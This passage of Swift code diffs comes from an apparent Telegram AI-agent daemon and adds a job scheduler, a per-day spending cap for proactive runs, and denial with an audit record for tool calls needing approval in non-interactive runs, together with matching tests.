+        fireAt = due  // a one-shot has exactly one occurrence: the stored one
+      }
+
+      guard
+        let fire = try jobs.claimAndFire(
+          jobId: job.id,
+          due: due,
+          fireAt: fireAt,
+          nextOccurrence: nextOccurrence(
+            for: job,
+            timezone: timezone,
+            anchor: due,
+            after: tickTime
+          ),
+          now: tickTime
+        )
+      else {
+        return  // CAS matched no row: claimed elsewhere / job mutated — no fire
+      }
+
+      await enqueue(fire)
+    } catch {
+      logger.error("scheduler fire failed for job \(job.id): \(error)")
+    }
+  }
+
+  private func skipMisfire(
+    job: ScheduledJob,
+    due: Date,
+    timezone: TimeZone,
+    tickTime: Date
+  ) throws {
+    let skippedCount =
+      job.recurrence.map { envelope in
+        calculator.occurrences(
+          rule: envelope.rule,
+          timezone: timezone,
+          anchor: due,
+          after: due.addingTimeInterval(-1),
+          limit: Self.misfireCountLimit
+        ).filter { occurrence in occurrence <= tickTime }.count
+      } ?? 1
+    _ = try jobs.skipMisfire(
+      jobId: job.id,
+      due: due,
+      nextOccurrence: nextOccurrence(for: job, timezone: timezone, anchor: due, after: tickTime),
+      skippedCount: skippedCount,
+      now: tickTime
+    )
+  }
+
+  /// The advanced next_occurrence: strictly after `after`; nil for a one-shot (→ COMPLETED).
+  /// `anchor` is the occurrence being advanced from (the claimed/skipped due) — advances stay
+  /// on the armed chain, so /schedule's confirm preview can never disagree with actual fires.
+  private func nextOccurrence(
+    for job: ScheduledJob,
+    timezone: TimeZone,
+    anchor: Date,
+    after: Date
+  ) -> Date? {
+    job.recurrence.flatMap { envelope in
+      calculator.occurrences(
+        rule: envelope.rule,
+        timezone: timezone,
+        anchor: anchor,
+        after: after,
+        limit: 1
+      ).first
+    }
+  }
+
+  /// D1: a claimed fire is a first-class lane citizen — ordered and cancellable like any turn.
+  private func enqueue(_ fire: ClaimedFire) async {
+    let runner = turns
+    let log = logger
+    let lane = await lanes.actor(for: fire.sessionId)
+    await lane.enqueue(runId: fire.runId) {
+      do {
+        try await runner.run(
+          runId: fire.runId,
+          sessionId: fire.sessionId,
+          chatId: fire.ownerChatId,
+          triggerMessageId: fire.triggerMessageId,
+          grant: nil
+        )
+      } catch {
+        // run() may throw only StoreError.diskFull; the lane closure cannot rethrow, so log it —
+        // the PENDING run stays durable and boot reconciliation resolves it (§5.2).
+        log.error("scheduled run \(fire.runId) failed with a storage error: \(error)")
+      }
+    }
+  }
+}

--- a/Sources/ClawGateway/Services/SchedulerService.swift
+++ b/Sources/ClawGateway/Services/SchedulerService.swift
@@ -56,7 +56,7 @@ public struct SchedulerService: Service {
         do {
           try await sleep(Self.tickInterval)
         } catch {
-          break  // cancellation unwinds the loop
+          break
         }
       }
     }
@@ -164,8 +164,11 @@ public struct SchedulerService: Service {
           anchor: due,
           after: due.addingTimeInterval(-1),
           limit: Self.misfireCountLimit
-        ).filter { occurrence in occurrence <= tickTime }.count
+        ).filter { occurrence in
+          occurrence <= tickTime
+        }.count
       } ?? 1
+
     _ = try jobs.skipMisfire(
       jobId: job.id,
       due: due,
@@ -199,7 +202,9 @@ public struct SchedulerService: Service {
   private func enqueue(_ fire: ClaimedFire) async {
     let runner = turns
     let log = logger
+
     let lane = await lanes.actor(for: fire.sessionId)
+
     await lane.enqueue(runId: fire.runId) {
       do {
         try await runner.run(

--- a/Sources/ClawTelegram/Client/TelegramClient.swift
+++ b/Sources/ClawTelegram/Client/TelegramClient.swift
@@ -2,8 +2,11 @@ import ClawCore
 import Foundation
 
 public struct TelegramClient: TelegramTransport {
-  /// Default slack added on top of the long-poll timeout so the socket outlives the poll.
-  public static let defaultHTTPTimeoutSlackSeconds = 15
+  /// §18-A3 (ARCHITECTURE §14): the getUpdates socket read timeout is the long-poll timeout
+  /// + 10 s — enough for the server to flush a full batch after the poll window, small enough
+  /// that a dead connection is detected within seconds, not minutes; the poller's backoff then
+  /// reconnects. Scheduler-side gap recovery is lateness-based (spec §5.3), no wake detection.
+  public static let defaultHTTPTimeoutSlackSeconds = 10
 
   private let token: String
   private let http: any HTTPExecuting

--- a/Sources/ClawTools/Policy/ToolPolicyGate.swift
+++ b/Sources/ClawTools/Policy/ToolPolicyGate.swift
@@ -91,6 +91,23 @@ public struct ToolPolicyGate: Sendable {
       return .allow(argsRedacted: conditional.redactedArgs, consumedGrant: true)
     }
 
+    if context.nonInteractive {
+      // §10 (D5): a non-interactive run never parks an approval — would-park becomes an
+      // immediate audited DENY, surfaced in the delivered result as a plain-language note. No
+      // pending entry ⇒ no dangling confirmation can bind to the owner's next unrelated "yes"
+      // (§16 case 3).
+      return .block(
+        payload: ToolPayload(
+          content: "skipped \(call.name) of \(canonical) — it needs your approval; "
+            + "run it interactively.",
+          status: .error,
+          ingestedUntrusted: false
+        ),
+        argsRedacted: conditional.redactedArgs,
+        pendingApproval: nil
+      )
+    }
+
     return .block(
       payload: ToolPayload(
         content:

--- a/Sources/ClawTools/Policy/ToolPolicyGate.swift
+++ b/Sources/ClawTools/Policy/ToolPolicyGate.swift
@@ -98,8 +98,10 @@ public struct ToolPolicyGate: Sendable {
       // (§16 case 3).
       return .block(
         payload: ToolPayload(
-          content: "skipped \(call.name) of \(canonical) — it needs your approval; "
-            + "run it interactively.",
+          content: """
+            skipped \(call.name) of \(canonical) — it needs your approval; \
+            run it interactively.
+            """,
           status: .error,
           ingestedUntrusted: false
         ),

--- a/Sources/clawd/Subcommands/DoctorCommand.swift
+++ b/Sources/clawd/Subcommands/DoctorCommand.swift
@@ -188,6 +188,32 @@ struct DoctorCommand: AsyncParsableCommand {
     )
     let freeBytes = (fileSystemAttributes?[.systemFreeSize] as? Int) ?? 0
     report.add(key: "db.free_disk", value: "\(freeBytes)", ok: freeBytes > 0)
+
+    let schedulerState =
+      (try? stores.scheduledJobs.schedulerState())
+      ?? SchedulerState(
+        lastTickAt: nil,
+        lastMisfireAt: nil,
+        lastMisfireSkippedCount: 0,
+        lastHeartbeatAt: nil,
+        heartbeatCountDay: nil,
+        heartbeatCount: 0
+      )
+    let dueCount = try? stores.scheduledJobs.dueJobs(now: now).count
+    let proactiveTodayUSD =
+      (try? stores.usage.todayTokensAndCost(origins: [.scheduled, .heartbeat], now: now))?.costUSD
+    for row in SchedulerHealth.rows(
+      state: schedulerState,
+      dueCount: dueCount,
+      proactiveTodayUSD: proactiveTodayUSD,
+      proactivePerDayUSD: config.budget.proactivePerDayUSD,
+      heartbeatEnabled: config.heartbeatEnabled,
+      heartbeatMaxPerDay: config.heartbeatMaxPerDay,
+      timezone: config.timezone,
+      now: now
+    ) {
+      report.add(key: row.key, value: row.value)
+    }
   }
 
   private func emit(_ report: DoctorReport) {

--- a/Sources/clawd/Subcommands/RunCommand.swift
+++ b/Sources/clawd/Subcommands/RunCommand.swift
@@ -232,8 +232,19 @@ struct RunCommand: AsyncParsableCommand {
       logger: logger
     )
 
+    let scheduler = SchedulerService(
+      jobs: stores.scheduledJobs,
+      lanes: lanes,
+      turns: turnRunner,
+      calculator: OccurrenceCalculator(),
+      catchUpMaxAge: .seconds(Int64(config.schedCatchUpMaxAgeMinutes) * 60),
+      now: { Date() },
+      sleep: { try await Task.sleep(for: $0) },
+      logger: logger
+    )
+
     return Daemon(
-      services: [poller, dispatcher],
+      services: [poller, dispatcher, scheduler],
       boot: bootSequence(transport: transport, stores: stores, logger: logger),
       logger: logger
     )

--- a/Tests/ClawAgentTests/RunBudgetTests.swift
+++ b/Tests/ClawAgentTests/RunBudgetTests.swift
@@ -82,4 +82,95 @@ struct RunBudgetTests {
     // then
     #expect(decision == .allow)
   }
+
+  @Test("a proactive run is denied at the proactive cap while the global caps still pass")
+  func proactivePreflightDeniesAtTheProactiveCap() {
+    // given — default budget: proactive cap 2.00 nested inside the 10.00 global cap
+    let gate = BudgetGate(budget: .default)
+
+    // when — 2.00 of proactive spend today; the global pool is far from its cap
+    let scheduled = gate.preflight(
+      todayTokens: 0,
+      todayUSD: 2.0,
+      estimatedTotalTokens: 1_000,
+      estimatedCostUSD: 0.01,
+      origin: .scheduled,
+      proactiveTodayUSD: 2.0
+    )
+    let heartbeat = gate.preflight(
+      todayTokens: 0,
+      todayUSD: 2.0,
+      estimatedTotalTokens: 1_000,
+      estimatedCostUSD: 0.01,
+      origin: .heartbeat,
+      proactiveTodayUSD: 2.0
+    )
+    let interactive = gate.preflight(
+      todayTokens: 0,
+      todayUSD: 2.0,
+      estimatedTotalTokens: 1_000,
+      estimatedCostUSD: 0.01
+    )
+
+    // then — both proactive origins deny on the nested cap; interactive is untouched (S3)
+    #expect(scheduled == .deny(cap: BudgetGate.proactivePerDayCap))
+    #expect(heartbeat == .deny(cap: "proactive per-day spend"))
+    #expect(interactive == .allow)
+  }
+
+  @Test("a proactive run whose estimate would cross the proactive cap is denied")
+  func proactivePreflightDeniesWhenTheEstimateWouldCrossTheCap() {
+    // given
+    let gate = BudgetGate(budget: .default)
+
+    // when — 1.99 spent, 0.02 estimated: 2.01 > 2.00
+    let decision = gate.preflight(
+      todayTokens: 0,
+      todayUSD: 1.99,
+      estimatedTotalTokens: 1_000,
+      estimatedCostUSD: 0.02,
+      origin: .scheduled,
+      proactiveTodayUSD: 1.99
+    )
+
+    // then
+    #expect(decision == .deny(cap: "proactive per-day spend"))
+  }
+
+  @Test("global checks run first, unchanged order — the household kill-switch wins")
+  func globalChecksRunBeforeTheProactiveCheck() {
+    // given — the global per-day cap is met AND the proactive pool is over its cap
+    let gate = BudgetGate(budget: .default)
+
+    // when
+    let decision = gate.preflight(
+      todayTokens: 0,
+      todayUSD: 10.0,
+      estimatedTotalTokens: 100,
+      origin: .scheduled,
+      proactiveTodayUSD: 5.0
+    )
+
+    // then — the GLOBAL cap is named, proving check order
+    #expect(decision == .deny(cap: "per-day spend"))
+  }
+
+  @Test("a proactive run under the proactive cap is allowed")
+  func proactivePreflightAllowsUnderTheCap() {
+    // given
+    let gate = BudgetGate(budget: .default)
+
+    // when
+    let decision = gate.preflight(
+      todayTokens: 0,
+      todayUSD: 0.50,
+      estimatedTotalTokens: 1_000,
+      estimatedCostUSD: 0.01,
+      origin: .heartbeat,
+      proactiveTodayUSD: 0.50
+    )
+
+    // then
+    #expect(decision == .allow)
+  }
 }

--- a/Tests/ClawAgentTests/Runtime/AgentLoopTests.swift
+++ b/Tests/ClawAgentTests/Runtime/AgentLoopTests.swift
@@ -103,6 +103,7 @@ import Testing
       retryBudget: 1,
       perRunUSD: 10,
       perDayUSD: 100,
+      proactivePerDayUSD: 2.00,
       referenceUSDPerToken: 0.000_015,
       maxTurns: 2,
       maxToolCalls: 20
@@ -134,6 +135,7 @@ import Testing
       retryBudget: 1,
       perRunUSD: 10,
       perDayUSD: 100,
+      proactivePerDayUSD: 2.00,
       referenceUSDPerToken: 0.000_015,
       maxTurns: 12,
       maxToolCalls: 2
@@ -162,6 +164,7 @@ import Testing
       retryBudget: 1,
       perRunUSD: 10,
       perDayUSD: 100,
+      proactivePerDayUSD: 2.00,
       referenceUSDPerToken: 0.000_015,
       maxTurns: 12,
       maxToolCalls: 2
@@ -307,6 +310,7 @@ import Testing
       retryBudget: 1,
       perRunUSD: 0.50,
       perDayUSD: 1_000,
+      proactivePerDayUSD: 2.00,
       referenceUSDPerToken: 0.000_000_1
     )
     let runtime = makeRuntime(
@@ -340,6 +344,7 @@ import Testing
       retryBudget: 1,
       perRunUSD: 10,
       perDayUSD: 100,
+      proactivePerDayUSD: 2.00,
       referenceUSDPerToken: 0.000_015
     )
     let runtime = makeRuntime(provider: provider, budget: budget, toolDispatcher: dispatcher)

--- a/Tests/ClawAgentTests/Runtime/AgentLoopTests.swift
+++ b/Tests/ClawAgentTests/Runtime/AgentLoopTests.swift
@@ -416,4 +416,40 @@ import Testing
     #expect(try requireCompleted(outcome.result).content == "recovered")
     #expect(outcome.exchanges[0].observations[0].status == .error)
   }
+
+  @Test func scheduledOriginThreadsNonInteractiveIntoTheDispatchContext() async throws {
+    // given
+    let provider = SequenceProvider([
+      toolCallResponse([fetchProposal()]),
+      okResponse(content: "done"),
+    ])
+    let dispatcher = ScriptedDispatcher(respond: okOutcome())
+    let runtime = makeRuntime(provider: provider, toolDispatcher: dispatcher)
+
+    // when
+    _ = try await run(runtime, origin: .scheduled)
+
+    // then — the single dispatched call saw the reduced-privilege flag
+    let records = await dispatcher.records
+    #expect(records.count == 1)
+    #expect(records[0].context.nonInteractive)
+  }
+
+  @Test func interactiveOriginThreadsNonInteractiveFalse() async throws {
+    // given
+    let provider = SequenceProvider([
+      toolCallResponse([fetchProposal()]),
+      okResponse(content: "done"),
+    ])
+    let dispatcher = ScriptedDispatcher(respond: okOutcome())
+    let runtime = makeRuntime(provider: provider, toolDispatcher: dispatcher)
+
+    // when — the default origin
+    _ = try await run(runtime)
+
+    // then
+    let records = await dispatcher.records
+    #expect(records.count == 1)
+    #expect(records[0].context.nonInteractive == false)
+  }
 }

--- a/Tests/ClawAgentTests/Runtime/AgentLoopTests.swift
+++ b/Tests/ClawAgentTests/Runtime/AgentLoopTests.swift
@@ -9,7 +9,9 @@ import Testing
     _ runtime: AgentRuntime,
     buildResult: BuildResult = makeBuildResult(),
     sessionTainted: Bool = false,
-    grant: OneTurnGrant? = nil
+    grant: OneTurnGrant? = nil,
+    origin: RunOrigin = .interactive,
+    proactiveTodayUSD: Double = 0
   ) async throws -> TurnOutcome {
     try await runtime.runTurn(
       runId: 1,
@@ -19,8 +21,36 @@ import Testing
       sessionTainted: sessionTainted,
       grant: grant,
       todayTokens: 0,
-      todayUSD: 0
+      todayUSD: 0,
+      origin: origin,
+      proactiveTodayUSD: proactiveTodayUSD
     )
+  }
+
+  @Test func proactiveRunStopsAtTheProactiveCapBeforeAnyProviderCall() async throws {
+    // given — the proactive pool is exhausted; the global pool is not
+    let provider = SequenceProvider([okResponse()])
+    let runtime = makeRuntime(provider: provider)
+
+    // when
+    let outcome = try await run(runtime, origin: .scheduled, proactiveTodayUSD: 2.0)
+
+    // then — denied offline, before the provider is reached
+    #expect(outcome.result == .budgetStopped(cap: "proactive per-day spend"))
+    #expect(await provider.requests.isEmpty)
+  }
+
+  @Test func interactiveRunIgnoresProactiveSpend() async throws {
+    // given — the same exhausted proactive pool
+    let provider = SequenceProvider([okResponse(content: "still on")])
+    let runtime = makeRuntime(provider: provider)
+
+    // when
+    let outcome = try await run(runtime, origin: .interactive, proactiveTodayUSD: 2.0)
+
+    // then — interactive runs never consult the nested pool (S3)
+    let completed = try requireCompleted(outcome.result)
+    #expect(completed.content == "still on")
   }
 
   @Test func toollessTurnIsOneRoundTripCompleted() async throws {

--- a/Tests/ClawAgentTests/Support/AgentTestSupport.swift
+++ b/Tests/ClawAgentTests/Support/AgentTestSupport.swift
@@ -186,6 +186,13 @@ final class RecordingUsageStore: UsageStore, @unchecked Sendable {
     (0, 0)
   }
 
+  func todayTokensAndCost(
+    origins: [RunOrigin],
+    now: Date
+  ) throws -> (tokens: Int, costUSD: Double) {
+    (0, 0)
+  }
+
   func costSourceMix(now: Date) throws -> [CostSource: Int] {
     [:]
   }

--- a/Tests/ClawCoreTests/Config/AppConfigTests.swift
+++ b/Tests/ClawCoreTests/Config/AppConfigTests.swift
@@ -319,4 +319,19 @@ import Testing
       try AppConfig.load(environment: env)
     }
   }
+
+  @Test func budgetMirrorsTheProactivePerDayCap() throws {
+    // given — the env key Phase 1 already parses onto AppConfig.proactivePerDayUSD
+    let env = envWithLLM([
+      EnvKey.stateRoot: NSTemporaryDirectory(),
+      "CLAW_PROACTIVE_PER_DAY_USD": "1.25",
+    ])
+
+    // when
+    let config = try AppConfig.load(environment: env)
+
+    // then — one value, two views: the AppConfig field (Phase 1) and the RunBudget mirror (here)
+    #expect(config.budget.proactivePerDayUSD == 1.25)
+    #expect(config.proactivePerDayUSD == 1.25)
+  }
 }

--- a/Tests/ClawCoreTests/Domain/Tools/ToolContractsTests.swift
+++ b/Tests/ClawCoreTests/Domain/Tools/ToolContractsTests.swift
@@ -107,7 +107,8 @@ import Testing
       assemblyPrivateData: true,
       runPrivateData: false,
       grant: grant,
-      approvalAlreadyPending: false
+      approvalAlreadyPending: false,
+      nonInteractive: false
     )
 
     // then

--- a/Tests/ClawDataTests/Stores/Bot/CommandStoreTests.swift
+++ b/Tests/ClawDataTests/Stores/Bot/CommandStoreTests.swift
@@ -56,7 +56,7 @@ import Testing
   @Test func stopCancelsOnlyRunningRunAndAuditsCancellation() throws {
     // given
     let env = try fixture()
-    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)))
+    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)) != nil)
     let queued = try env.sessions.claimAndPersistInbound(
       inbound(updateId: 2, sessionKey: env.sessionKey, text: "queued")
     )
@@ -95,7 +95,7 @@ import Testing
   @Test func newSupersedesActiveRunsResetsWindowDetaintsAndAudits() throws {
     // given
     let env = try fixture()
-    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)))
+    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)) != nil)
     let queued = try env.sessions.claimAndPersistInbound(
       inbound(updateId: 2, sessionKey: env.sessionKey, text: "queued")
     )
@@ -161,7 +161,7 @@ import Testing
   @Test func duplicateCommandDoesNotRepeatEffects() throws {
     // given
     let env = try fixture()
-    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)))
+    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)) != nil)
     let now = Date(timeIntervalSince1970: 300)
     let first = try env.commands.applyStop(updateId: 300, sessionKey: env.sessionKey, now: now)
 
@@ -182,7 +182,7 @@ import Testing
   @Test func crashAfterClaimRollsBackClaimAndAllowsRetry() throws {
     // given
     let env = try fixture()
-    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)))
+    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)) != nil)
     let crashingStore = CommandStoreGRDB(
       writer: env.queue,
       afterClaimForTesting: { throw InjectedCrash() }

--- a/Tests/ClawDataTests/Stores/Bot/CommandStoreTests.swift
+++ b/Tests/ClawDataTests/Stores/Bot/CommandStoreTests.swift
@@ -56,7 +56,9 @@ import Testing
   @Test func stopCancelsOnlyRunningRunAndAuditsCancellation() throws {
     // given
     let env = try fixture()
-    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)) != nil)
+    _ = try #require(
+      try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10))
+    )
     let queued = try env.sessions.claimAndPersistInbound(
       inbound(updateId: 2, sessionKey: env.sessionKey, text: "queued")
     )
@@ -95,7 +97,9 @@ import Testing
   @Test func newSupersedesActiveRunsResetsWindowDetaintsAndAudits() throws {
     // given
     let env = try fixture()
-    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)) != nil)
+    _ = try #require(
+      try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10))
+    )
     let queued = try env.sessions.claimAndPersistInbound(
       inbound(updateId: 2, sessionKey: env.sessionKey, text: "queued")
     )
@@ -161,7 +165,9 @@ import Testing
   @Test func duplicateCommandDoesNotRepeatEffects() throws {
     // given
     let env = try fixture()
-    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)) != nil)
+    _ = try #require(
+      try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10))
+    )
     let now = Date(timeIntervalSince1970: 300)
     let first = try env.commands.applyStop(updateId: 300, sessionKey: env.sessionKey, now: now)
 
@@ -182,7 +188,9 @@ import Testing
   @Test func crashAfterClaimRollsBackClaimAndAllowsRetry() throws {
     // given
     let env = try fixture()
-    #expect(try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10)) != nil)
+    _ = try #require(
+      try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10))
+    )
     let crashingStore = CommandStoreGRDB(
       writer: env.queue,
       afterClaimForTesting: { throw InjectedCrash() }

--- a/Tests/ClawDataTests/Stores/Delivery/OutboxStoreTests.swift
+++ b/Tests/ClawDataTests/Stores/Delivery/OutboxStoreTests.swift
@@ -101,7 +101,7 @@ import Testing
         payloadHash: "p"
       ) == false
     )
-    #expect(try env.runs.pickUp(runId: env.runId, now: Date()) != nil)
+    _ = try #require(try env.runs.pickUp(runId: env.runId, now: Date()))
     #expect(
       try env.outbox.claimOutboundIfRunActive(
         runId: env.runId,

--- a/Tests/ClawDataTests/Stores/Delivery/OutboxStoreTests.swift
+++ b/Tests/ClawDataTests/Stores/Delivery/OutboxStoreTests.swift
@@ -101,7 +101,7 @@ import Testing
         payloadHash: "p"
       ) == false
     )
-    #expect(try env.runs.pickUp(runId: env.runId, now: Date()))
+    #expect(try env.runs.pickUp(runId: env.runId, now: Date()) != nil)
     #expect(
       try env.outbox.claimOutboundIfRunActive(
         runId: env.runId,

--- a/Tests/ClawDataTests/Stores/Observability/UsageStoreTests.swift
+++ b/Tests/ClawDataTests/Stores/Observability/UsageStoreTests.swift
@@ -1,5 +1,6 @@
 import ClawCore
 import Foundation
+import GRDB
 import Testing
 
 @testable import ClawData
@@ -45,5 +46,83 @@ import Testing
     // then
     #expect(tokens == 150)
     #expect(abs(cost - 0.0123) < 1e-9)
+  }
+
+  @Test func originFilteredTotalsSumOnlyJoinedOriginUsage() throws {
+    // given — one interactive run and one scheduled run, each with usage recorded today
+    let queue = try ClawDatabase.makeInMemoryQueue()
+    try ClawDatabase.migrate(queue)
+    let sessions = SessionMessageStoreGRDB(writer: queue)
+    let interactiveClaim = try sessions.claimAndPersistInbound(
+      InboundMessage(
+        updateId: 1,
+        sessionKey: SessionKey.telegramDM(chatId: 42),
+        chatId: 42,
+        userId: 42,
+        text: "seed",
+        isEdited: false,
+        ts: Date()
+      )
+    )
+    let scheduledClaim = try sessions.claimAndPersistInbound(
+      InboundMessage(
+        updateId: 2,
+        sessionKey: SessionKey.telegramDM(chatId: 43),
+        chatId: 43,
+        userId: 43,
+        text: "seed",
+        isEdited: false,
+        ts: Date()
+      )
+    )
+    let interactiveRunId = try #require(interactiveClaim.runId)
+    let scheduledRunId = try #require(scheduledClaim.runId)
+    try queue.write { db in
+      try db.execute(
+        sql: "UPDATE runs SET origin = 'scheduled' WHERE id = ?",
+        arguments: [scheduledRunId]
+      )
+    }
+
+    let usage = UsageStoreGRDB(writer: queue)
+    let now = Date()
+    try usage.recordUsage(
+      ProviderUsage(
+        runId: interactiveRunId,
+        sessionId: try #require(interactiveClaim.sessionId),
+        model: "m",
+        promptTokens: 100,
+        completionTokens: 50,
+        costUSD: 0.40,
+        costSource: .providerReturned,
+        isEstimated: false,
+        ts: now
+      )
+    )
+    try usage.recordUsage(
+      ProviderUsage(
+        runId: scheduledRunId,
+        sessionId: try #require(scheduledClaim.sessionId),
+        model: "m",
+        promptTokens: 10,
+        completionTokens: 5,
+        costUSD: 1.25,
+        costSource: .providerReturned,
+        isEstimated: false,
+        ts: now
+      )
+    )
+
+    // when — one query, one UTC-day-boundary evaluation (preamble deviation 2)
+    let proactive = try usage.todayTokensAndCost(origins: [.scheduled, .heartbeat], now: now)
+    let everything = try usage.todayTokensAndCost(now: now)
+    let none = try usage.todayTokensAndCost(origins: [], now: now)
+
+    // then — only the joined-origin usage is summed; the global total is untouched
+    #expect(proactive.tokens == 15)
+    #expect(abs(proactive.costUSD - 1.25) < 1e-9)
+    #expect(everything.tokens == 165)
+    #expect(none.tokens == 0)
+    #expect(none.costUSD == 0)
   }
 }

--- a/Tests/ClawDataTests/Stores/Run/ExchangeCommitTests.swift
+++ b/Tests/ClawDataTests/Stores/Run/ExchangeCommitTests.swift
@@ -31,7 +31,7 @@ import Testing
     )
     let runs = RunStoreGRDB(writer: queue)
     let runId = claim.runId ?? 0
-    #expect(try runs.pickUp(runId: runId, now: Date()))
+    #expect(try runs.pickUp(runId: runId, now: Date()) != nil)
     return Fixture(queue: queue, runs: runs, sessionId: claim.sessionId ?? 0, runId: runId)
   }
 

--- a/Tests/ClawDataTests/Stores/Run/ExchangeCommitTests.swift
+++ b/Tests/ClawDataTests/Stores/Run/ExchangeCommitTests.swift
@@ -31,7 +31,7 @@ import Testing
     )
     let runs = RunStoreGRDB(writer: queue)
     let runId = claim.runId ?? 0
-    #expect(try runs.pickUp(runId: runId, now: Date()) != nil)
+    _ = try #require(try runs.pickUp(runId: runId, now: Date()))
     return Fixture(queue: queue, runs: runs, sessionId: claim.sessionId ?? 0, runId: runId)
   }
 

--- a/Tests/ClawDataTests/Stores/Run/JobRunFailureTests.swift
+++ b/Tests/ClawDataTests/Stores/Run/JobRunFailureTests.swift
@@ -1,0 +1,168 @@
+import ClawCore
+import Foundation
+import GRDB
+import Testing
+
+@testable import ClawData
+
+@Suite struct JobRunFailureTests {
+  private struct JobFixture {
+    let queue: DatabaseQueue
+    let runs: RunStoreGRDB
+    let runId: Int64
+    let sessionId: Int64
+  }
+
+  /// Seeds job 7 (owner chat 4242), its synthetic session, the trusted trigger message, and a
+  /// PENDING scheduled run — the exact §5.2 fused-claim output shape, by hand.
+  private func makeJobRunFixture() throws -> JobFixture {
+    let queue = try ClawDatabase.makeInMemoryQueue()
+    try ClawDatabase.migrate(queue)
+    let now = Date()
+    let seeded: (runId: Int64, sessionId: Int64) = try queue.write { db in
+      try db.execute(
+        sql: """
+          INSERT INTO scheduled_jobs(id, owner_chat_id, label, prompt, recurrence, timezone,
+            next_occurrence, last_fired_at, status, session_id, created_ts, updated_ts)
+          VALUES (7, 4242, 'digest', 'Summarize my unread items', NULL, 'Europe/Berlin',
+            NULL, NULL, 'ACTIVE', NULL, ?, ?)
+          """,
+        arguments: [now, now]
+      )
+      try db.execute(
+        sql: "INSERT INTO sessions(session_key, created_ts, updated_ts) VALUES (?, ?, ?)",
+        arguments: [SessionKey.scheduledJob(id: 7), now, now]
+      )
+      let sessionId = db.lastInsertedRowID
+      try db.execute(
+        sql: """
+          INSERT INTO messages(session_id, role, content, provenance, ts)
+          VALUES (?, 'user', 'Summarize my unread items', 'trusted', ?)
+          """,
+        arguments: [sessionId, now]
+      )
+      let messageId = db.lastInsertedRowID
+      try db.execute(
+        sql: """
+          INSERT INTO runs(session_id, state, created_ts, updated_ts, trigger_message_id,
+            origin, job_id)
+          VALUES (?, 'PENDING', ?, ?, ?, 'scheduled', 7)
+          """,
+        arguments: [sessionId, now, now, messageId]
+      )
+      return (db.lastInsertedRowID, sessionId)
+    }
+    return JobFixture(
+      queue: queue,
+      runs: RunStoreGRDB(writer: queue),
+      runId: seeded.runId,
+      sessionId: seeded.sessionId
+    )
+  }
+
+  private func jobFailedCount(_ queue: DatabaseQueue, runId: Int64) throws -> Int {
+    try queue.read { db in
+      try Int.fetchOne(
+        db,
+        sql: """
+          SELECT COUNT(*) FROM audit_events
+          WHERE action = 'job_failed' AND decision = 'job:7' AND run_id = ?
+          """,
+        arguments: [runId]
+      ) ?? 0
+    }
+  }
+
+  @Test func degradedCommitOfAJobRunAppendsJobFailedInTheSameTransaction() throws {
+    // given
+    let fixture = try makeJobRunFixture()
+    #expect(try fixture.runs.pickUp(runId: fixture.runId, now: Date()) == .scheduled)
+
+    // when
+    let commit = try fixture.runs.commitDegradedTurn(
+      DegradedTurn(
+        runId: fixture.runId,
+        sessionId: fixture.sessionId,
+        chatId: 4242,
+        usage: nil,
+        chunk: OutboxChunk(
+          stepIndex: 0,
+          chatId: 4242,
+          payload: "degraded",
+          payloadHash: ContentHash.fnv1a("degraded")
+        )
+      ),
+      now: Date()
+    )
+
+    // then
+    #expect(commit == .committed)
+    #expect(try jobFailedCount(fixture.queue, runId: fixture.runId) == 1)
+  }
+
+  @Test func failRunOnAJobRunAppendsJobFailed() throws {
+    // given
+    let fixture = try makeJobRunFixture()
+    #expect(try fixture.runs.pickUp(runId: fixture.runId, now: Date()) == .scheduled)
+
+    // when
+    try fixture.runs.failRun(runId: fixture.runId, now: Date())
+
+    // then
+    #expect(try jobFailedCount(fixture.queue, runId: fixture.runId) == 1)
+  }
+
+  @Test func bootReconcileResolvesTheJobRunNoticeViaOwnerChatIdAndAuditsJobFailed() throws {
+    // given — a job run left RUNNING by a crash; its sched:job:7 session key has no chat id
+    let fixture = try makeJobRunFixture()
+    #expect(try fixture.runs.pickUp(runId: fixture.runId, now: Date()) == .scheduled)
+
+    // when
+    let replies = try fixture.runs.reconcileRunsAtBoot(
+      now: Date(),
+      degradationText: "unfinished"
+    )
+
+    // then — the notice targets scheduled_jobs.owner_chat_id, no longer silently skipped (A6)
+    #expect(replies == [DegradationReply(chatId: 4242, runId: fixture.runId, text: "unfinished")])
+    #expect(try jobFailedCount(fixture.queue, runId: fixture.runId) == 1)
+    let state = try fixture.queue.read { db in
+      try String.fetchOne(
+        db,
+        sql: "SELECT state FROM runs WHERE id = ?",
+        arguments: [fixture.runId]
+      )
+    }
+    #expect(state == "FAILED")
+  }
+
+  @Test func nonJobRunsNeverEmitJobFailed() throws {
+    // given — an ordinary interactive run (no job_id), failed the same way
+    let queue = try ClawDatabase.makeInMemoryQueue()
+    try ClawDatabase.migrate(queue)
+    let claim = try SessionMessageStoreGRDB(writer: queue).claimAndPersistInbound(
+      InboundMessage(
+        updateId: 1,
+        sessionKey: SessionKey.telegramDM(chatId: 42),
+        chatId: 42,
+        userId: 42,
+        text: "hi",
+        isEdited: false,
+        ts: Date()
+      )
+    )
+    let runId = try #require(claim.runId)
+    let runs = RunStoreGRDB(writer: queue)
+    #expect(try runs.pickUp(runId: runId, now: Date()) == .interactive)
+
+    // when
+    try runs.failRun(runId: runId, now: Date())
+
